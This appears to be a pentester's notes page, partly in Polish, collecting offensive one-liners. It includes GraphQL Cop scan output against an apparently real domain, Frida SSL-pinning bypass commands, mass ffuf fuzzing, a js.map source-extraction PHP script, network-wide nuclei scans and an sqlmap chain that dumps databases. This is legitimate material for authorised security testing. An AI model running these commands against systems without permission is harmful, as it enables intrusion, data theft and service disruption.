self xss

 https://blog.slonser.info/posts/make-self-xss-great-again/?utm_source=unknownews

AI Hacking

 Markdown w AI 

GraphQL Cop - Security Audit Utility for GraphQL

 GraphQL Cop to małe narzędzie Pythona do uruchamiania typowych testów bezpieczeństwa dla interfejsów API GraphQL. GraphQL Cop jest idealny do przeprowadzania kontroli CI/CD w GraphQL. Jest lekki i obejmuje interesujące kwestie bezpieczeństwa w GraphQL.

GraphQL Cop pozwala odtworzyć wyniki, dostarczając polecenia cURL dla wszelkich zidentyfikowanych luk w zabezpieczeniach.

Writeup odnośnie GraphQL - https://blog.koalasec.co/2500-dollars-in-bounties-hacking-graphql 

https://github.com/dolevf/graphql-cop

└─# python3 graphql-cop.py -t https://sdb.ua/?q=getnciesList                                                                    1 ⨯

[HIGH] Alias Overloading - Alias Overloading with 100+ aliases is allowed (Denial of Service - /graphiql)

[HIGH] Alias Overloading - Alias Overloading with 100+ aliases is allowed (Denial of Service - /playground)

[HIGH] Alias Overloading - Alias Overloading with 100+ aliases is allowed (Denial of Service - /console)

[HIGH] Alias Overloading - Alias Overloading with 100+ aliases is allowed (Denial of Service - /graphql)

[HIGH] Directive Overloading - Multiple duplicated directives allowed in a query (Denial of Service - /graphiql)

[HIGH] Directive Overloading - Multiple duplicated directives allowed in a query (Denial of Service - /playground)

[HIGH] Directive Overloading - Multiple duplicated directives allowed in a query (Denial of Service - /console)

[HIGH] Directive Overloading - Multiple duplicated directives allowed in a query (Denial of Service - /graphql)

[HIGH] Field Duplication - Queries are allowed with 500 of the same repeated field (Denial of Service - /graphiql)

[HIGH] Field Duplication - Queries are allowed with 500 of the same repeated field (Denial of Service - /playground)

[HIGH] Field Duplication - Queries are allowed with 500 of the same repeated field (Denial of Service - /console)

[HIGH] Field Duplication - Queries are allowed with 500 of the same repeated field (Denial of Service - /graphql)

[LOW] Field Suggestions - Field Suggestions are Enabled (Information Leakage - /graphiql)

[LOW] Field Suggestions - Field Suggestions are Enabled (Information Leakage - /playground)

[LOW] Field Suggestions - Field Suggestions are Enabled (Information Leakage - /console)

[LOW] Field Suggestions - Field Suggestions are Enabled (Information Leakage - /graphql)

[HIGH] Introspection - Introspection Query Enabled (Information Leakage - /graphiql)

[HIGH] Introspection - Introspection Query Enabled (Information Leakage - /playground)

[HIGH] Introspection - Introspection Query Enabled (Information Leakage - /console)

[HIGH] Introspection - Introspection Query Enabled (Information Leakage - /graphql)

apk speed enviroment for pentest

emulator -avd Pixel_5_API_30 

 adb root; adb connect localhost:6000; sleep 1; adb push frida-server /data/local/tmp/; adb shell "chmod 755 /data/local/tmp/frida-server"; adb shell "/data/local/tmp/frida-server &" 

next

frida-ps -U |grep APK

  frida -U -n APK --codeshare pcipolloni/universal-android-ssl-pinning-bypass-with-frida 

or

  frida -U -n APK --codeshare akabe1/frida-multiple-unpinning

run ffuf from all domains from file

httpx -list mexico | xargs -I {} sh -c 'clean_url=$(echo {} | sed -e "s|https://|1|g" -e "s|http://|2|g"); ffuf -u {}/FUZZ -w raft-large-words.txt -ac -c -e .txt,.php,.bak,.txt,.rar,.sql,.zip,.php_,.old,.bak,._old,._php  --recursion --recursion-depth 2 >> ffuf-mexico$clean_url' 

Pliki *.js.map

 W aplikacjach webowych pamiętaj aby sprawdzać czy deweloper nie zapomniał o usunięciu plików .js.map.

Szybki skrypt w PHP i zazwyczaj dobry efekt

<?php
/**
 * Created by PhpStorm.
 * User: edwinsturt
 * Date: 2020-06-24
 * Time: 00:45
 */

$file = 'main.ff0058ad.js.map';

if(file_exists($file)) {
    $json = json_decode(file_get_contents($file));

    $directories = [];

    foreach ($json->sources as $index => $source) {

        $dir = dirname($source);
        if (!is_dir($dir)) {
            mkdir($dir, 0755, true);
        }
        $data = explode('/', $source);
        $file = end($data);
        file_put_contents($dir . "/" . $file, $json->sourcesContent[$index]);
        $files[] = $dir . "/" . $file;

    }
    echo "<pre>All Source codes has been extracted from map file ";
    print_r($files);
}
?>

php skrypt.php i witamy env :)

Run nuclei for all ports

Uruchamianie nuclei na wszystkich portach 

naabu -s -host 192.168.1.0/24 |  while read -r line; do nuclei -u "${line}" >> siec_wew ; done







nmap -iL mexico -p- --open -oG - | awk '/Up$/{print $2}' | xargs -I {} nuclei -target {} -o mexico_all-nuclei

SQLi oneliner automation

 subfinder -d testphp.vulnweb.com -all -silent | gau | urldedupe | gf sqli >sql.txt; sqlmap -m sql.txt --batch --dbs --risk 2 --level 5 --random-agent | tee -a sqli.txt

go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest

go install github.com/lc/gau/v2/cmd/gau@latest

git clone https://github.com/ameenmaali/urldedupe.git;cd urldedupe;cmake CMakeLists.txt;make;cp urldedupe /usr/bin/

go install github.com/tomnomnom/gf@latest;cp ~/go/bin/gf /usr/bin/;mkdir ~/.gf;git clone https://github.com/Sherlock297/gf_patterns.git;cd gf_patterns/;cp *.json ~/.gf;gf -list